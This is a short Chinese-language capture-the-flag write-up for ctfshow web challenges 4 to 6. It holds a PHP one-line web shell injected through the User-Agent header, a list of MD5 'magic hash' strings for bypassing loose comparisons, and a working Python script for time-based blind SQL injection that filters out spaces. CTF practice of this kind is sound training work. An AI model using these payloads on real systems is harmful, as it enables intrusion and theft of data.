ctfshow web刷题

web4

在url添加一句话会被编码,在User-Agent中添加。 

1
2
3
4
5
6
7
8
GET / HTTP/1.1
Host: 0962422f-8459-4372-8ed2-acebe03635c0.challenge.ctf.show:8080
User-Agent: <?php @eval($_POST[a]);?> Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

web5

md5

1
2
3
4
5
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a

web6

password字段存在注入,过滤了空格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import requests
import time
from functools import wraps

def spend_time(func):
    @wraps(func)
    def wrapper(*agrs, **kwargs):
        startTime = time.time()
        func(*agrs, **kwargs)
        endTime = time.time()
        sumTime = endTime - startTime
        print("spend time:", sumTime)

    return wrapper


def and_operation():
    url = "http://dceb0f35-65a5-4f40-856e-ecdc2d487f30.challenge.ctf.show:8080/"
    flag_payload = "1'/**/or/**/if((ascii(substr((select/**/flag/**/from/**/flag),{0},1))&{1}),sleep(2),1)/**/#"
    info = ""
    for j in range(1, 100):
        value = 0
        for k in range(7):
            payload = flag_payload.format(j, 2 ** k)
            data = {
                "username": "admin",
                "password": payload
            }
            start_time=time.time()
            res = requests.post(url=url, data=data)
            end_time=time.time()
            spend_time=end_time-start_time
            if spend_time>2:
                value = value + (2 ** k)
        if value == 0:
            break
        info = info + chr(value)
        print(info)


if __name__ == "__main__":
    and_operation()